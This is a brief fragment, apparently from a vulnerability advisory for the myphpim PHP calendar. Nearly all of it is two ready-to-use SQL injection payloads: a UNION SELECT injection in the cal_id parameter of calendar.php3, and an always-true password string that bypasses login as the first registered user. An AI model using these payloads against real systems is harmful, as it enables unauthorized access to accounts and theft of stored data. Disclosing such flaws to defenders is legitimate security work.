| Code |
An exploit is not required.
SQL injection examples have been provided:
http://www.example.com/myphpim/calendar.php3?menu=detail&cal_id=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
login: [first registered user] pass: a") or "a"="a"/*
|